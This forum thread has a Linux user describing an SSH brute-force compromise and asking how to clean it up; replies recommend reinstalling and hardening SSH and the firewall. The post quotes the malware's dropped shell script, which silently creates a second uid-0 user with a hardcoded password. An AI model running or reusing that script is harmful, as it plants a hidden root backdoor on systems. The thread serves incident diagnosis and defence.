# How to deal with malware on my laptop?

Tags: security, malware

I am fairly certain that my Ubuntu 13.10 laptop is infected with some sort of malware.

Every once in a while, I find a process /lib/sshd (owned by root) running and consuming lots of cpu. It is not the sshd server which runs /usr/sbin/sshd.

The binary has --wxrw-rwt permissions and it generates and spawns scripts in the /lib directory. A recent one is named 13959730401387633604 and it does the following

```
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
```

The gusr user was created by the malware independently, and then the chpasswd hangs while consuming 100% cpu.

So far, I've identified that the gusr user was additionally added to files in /etc/

```
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
```

It seems like the malware made copies of all these files with the "-" suffix. The full list of /etc/ files that were modified by root is available [here](http://pastebin.com/d4WVX8JL).

In addition, the /etc/hosts file was changed to the [this](http://pastebin.com/HsgWUk1z).

The /lib/sshd starts by adding itself to the end of /etc/init.d/rc.local file!

I've removed the user, removed the files, killed the tree of processed, changed my passwors and removed the ssh public keys.

I am aware that I am basically screwed, and I will most likely reinstall the whole system. Nevertheless, since I login to several other machines, it would be good to at least attempt to remove it, and figure out how I got it. Any suggestions on how to go about this would be appreciated.

It seems like they got in on March 25 by brute-forcing root login. I had no idea that root ssh is enabled by default in Ubuntu. I disabled it and put up denyhosts.

The login was from 59.188.247.236, somewhere in Hong Kong apparently.

I got the laptop from EmperorLinux, and they enabled root access. If you have one of those and you're running sshd beware.

Comment: Get your machine OFF the network! Now!

Comment: And why do you have root login enabled? That's something you *should not* enable without a good reason.

Comment: @Seth I didn't enable it, it was [on by default](https://help.ubuntu.com/community/StricterDefaults#SSH_Root_Login) in Ubuntu. I'm as surprised as you are.

Comment: That's ssh root login, it doesn't enable the root account.

Comment: See "*By default, the SSH daemon ships with remote root logins enabled. Normally Ubuntu does not allow direct access to the root user, so this setting is unimportant. If you have set a password on the root account, this setting can be a potential security risk, and should be disabled.*"

Comment: I see. I don't recall enabling the root account myself. Still, I checked the backup of the shadow that was made and it was indeed enabled.

Comment: chaonimabi? chinese hacker..

Comment: I'm fairly certain that this is not `Linux/Ebury`. It's something else, and possibly doesn't have a name assigned. Ebury wouldn't create a new user account, and would've modified the shared library used by openssh, not dropped in a new binary named sshd.

Answer (score 11, accepted):

First, get that machine off the network now!

Second, why did you have the root account enabled? You really shouldn't enable the root account unless you have a very good reason to do so.

Thirdly, yes, the only way to be sure you're clean is to do a clean install. It's also advised that you start fresh and don't go back to a backup, as you can never be sure when it all started.

I also suggest that you set up a a firewall in your next install and deny all incoming connections:

```
sudo ufw default deny incoming
```

and then allow ssh with:

```
sudo ufw allow ssh
```

and DON'T enable the root account! *Certainly* make sure that root ssh login is disabled.

Comment: I checked the root account. I got the laptop from Emperorlinux and they enabled the account to set it up. Stupid.

Comment: @DejanJovanović That's terrible!